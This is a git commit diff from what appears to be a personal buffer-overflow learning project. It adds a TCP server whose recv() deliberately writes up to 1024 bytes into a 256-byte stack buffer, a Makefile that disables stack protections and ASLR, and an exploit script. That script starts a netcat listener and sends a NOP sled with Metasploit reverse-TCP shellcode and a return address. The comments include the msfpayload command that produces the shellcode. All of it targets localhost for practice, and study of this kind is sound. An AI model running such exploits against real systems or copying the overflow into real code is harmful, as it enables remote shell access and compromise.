diff options
| author | toni <matzeton@googlemail.com> | 2014-06-29 20:52:59 +0200 |
|---|---|---|
| committer | toni <matzeton@googlemail.com> | 2014-06-29 20:52:59 +0200 |
| commit | f2371a6b48d7f76fc07564f4e1e4d64e643a897e (patch) | |
| tree | 91d7f779092ee6fcbbce773e8742ca90b4717bdc | |
| parent | 7b891a0d5e83dd9c3295397e3af5e78ec5d3f410 (diff) | |
- makefile improved
- tcp recv() based overrun works
- automatic exploit && shell spawning script
| -rw-r--r-- | Makefile | 12 | ||||
| -rwxr-xr-x | exploit_tcp.sh | 30 | ||||
| -rw-r--r-- | overflow_tcp.c | 40 |
3 files changed, 56 insertions, 26 deletions
@@ -1,13 +1,22 @@ RM := rm CC := gcc STRIP := strip -CFLAGS = -Wall -g3 +CFLAGS = -Wall -g OCFLAGS = -m32 -mpreferred-stack-boundary=2 -z execstack -fno-stack-protector TARGETS = $(patsubst %.c,%.o,$(wildcard *.c)) all: $(TARGETS) post-build post-build: + @read -p "disable protection stuff? (y/N) " answ; \ + if [ "x$$answ" != "xy" ]; then \ + echo "abort .."; \ + return 0; \ + else \ + ./disable_prot.sh; \ + fi + +disable-prot: if [ `cat /proc/sys/kernel/randomize_va_space` -eq 0 ]; then \ echo "not necessary to run ./disable_prot.sh"; \ else \ @@ -16,7 +25,6 @@ post-build: %.o : %.c $(CC) $(CFLAGS) $(OCFLAGS) -o $(patsubst %.o,%,$@) $< - $(STRIP) $(patsubst %.o,%,$@) clean: $(RM) -f $(patsubst %.o,%,$(TARGETS)) diff --git a/exploit_tcp.sh b/exploit_tcp.sh index 4630887..106489d 100755 --- a/exploit_tcp.sh +++ b/exploit_tcp.sh @@ -1,11 +1,29 @@ #!/bin/sh -# shellcode generated with metasploit (exec /bin/sh): -# ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20' +# shellcode generated with metasploit (reverse tcp shell; use netcat as tcp server): +# ./msfpayload linux/x86/shell_reverse_tcp PrependFork=true AppendExit=true LHOST=127.0.0.1 VERBOSE=true R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20' -# 117xNOP (0x90) + shellcode + 117xNOP (0x90) + return addr -#[*] Exact match at offset 284 +# 260 --> 260 - 102 = 158 / 2 = 79 +# 79xNOP (0x90) + shellcode + 79xNOP (0x90) + return addr +echo "starting netcat reverse tcp server .." +screen -d -m -S overcat /bin/netcat -l -s 127.0.0.1 -p 4444 +sleep 1 +echo "starting exploitable tcp server .." +./overflow_tcp & +sleep 1 -read -p "Target: " host -python -c 'print "\x90"*117 + "\xd9\xcd\xd9\x74\x24\xf4\xbf\xc9\x14\x15\x14\x5d\x31\xc9\xb1\x0b\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\x3c\x7e\x1e\x4c\x27\x2d\x46\x04\x7a\xb1\x0f\x33\xec\x1a\x63\xd4\xec\x0c\xac\x46\x85\xa2\x3b\x65\x07\xd3\x34\x6a\xa7\x23\x6a\x08\xce\x4d\x5b\xbf\x78\x92\xf4\x6c\xf1\x73\x37\x12" + "\x90"*117 + "\x8c\xd3\xff\xff"' | nc -q 0 "$host" 3000 +host="127.0.0.1" +echo "connecting to $host .." +python -c 'print "\x90"*79 + \ +"\xba\x91\x60\x15\x91\xdb\xd6\xd9\x74\x24\xf4\x5f\x2b\xc9" + \ +"\xb1\x13\x31\x57\x15\x83\xc7\x04\x03\x57\x11\xe2\x64\x51" + \ +"\xce\x66\x65\xc1\xb3\xdb\x03\xe4\xba\x3d\x63\x8e\x71\x3d" + \ +"\x10\x16\x3a\x01\xdb\x29\x73\x07\x1a\x41\xfb\xf7\xdc\x93" + \ +"\x6b\xfa\xdc\x82\x37\x73\x3d\x14\xa1\xd3\xec\x06\x9d\xd7" + \ +"\x87\x48\x2c\x57\xc5\xe2\x80\x77\x9a\x9a\xb6\xa8\x3e\x32" + \ +"\x29\x3e\x5d\x96\xe6\xc9\x40\xa7\x02\x07\x02\xf9\xcf\xfd" + \ +"\x03\xa2\x22\x81" + \ +"\x90"*83 + "\x9d\xd4\xff\xff"' | nc -q 0 "$host" 3000 + +screen -R overcat diff --git a/overflow_tcp.c b/overflow_tcp.c index cafeaec..24af99e 100644 --- a/overflow_tcp.c +++ b/overflow_tcp.c @@ -6,19 +6,32 @@ #include <netinet/in.h> #include <string.h> #include <unistd.h> -#include <signal.h> #define MAXLINE 1024 #define BUFLEN 256 #define SERV_PORT 3000 #define LISTENQ 8 + +int exploitable(int fd) +{ + int n; + char buf[BUFLEN]; + + memset(buf, 0, BUFLEN); + if (buf[0] == EOF) { + return (0); + } + + n = recv(fd, buf, MAXLINE, 0); + fprintf(stderr, "Received string(%d): %s", n, buf); + return (n); +} + int main (int argc, char **argv) { - int listenfd, connfd, n, line = 0, status; - pid_t childpid, w; + int listenfd, connfd, n; socklen_t clilen; - char buf[BUFLEN]; struct sockaddr_in cliaddr, servaddr; if ((listenfd = socket(AF_INET, SOCK_STREAM, 0)) <0) { @@ -41,26 +54,17 @@ int main (int argc, char **argv) fprintf(stderr, "Server running on port %d ...\n", SERV_PORT); for (;;) { - memset(buf, 0, BUFLEN); clilen = sizeof(cliaddr); - connfd = accept (listenfd, (struct sockaddr *) &cliaddr, &clilen); + connfd = accept(listenfd, (struct sockaddr *) &cliaddr, &clilen); if (connfd < 0) break; fprintf(stderr, "Client connected.\n"); - if ((childpid = fork ()) == 0 ) { - while ((n = recv(connfd, buf, MAXLINE,0)) > 0) { - fprintf(stderr, "[%d] Received string(%d): %s", line, n, buf); - memset(buf, 0, BUFLEN); - line++; - } - exit(1); - } - if ((w = wait(&status))) { - if (WIFEXITED(status)) { - kill(w, SIGCHLD); - } + while ((n = exploitable(connfd)) > 0) { } + fprintf(stderr, "disconnecting client ..\n"); + close(connfd); } + fprintf(stderr, "shutdown ..\n"); close(listenfd); return (0); } |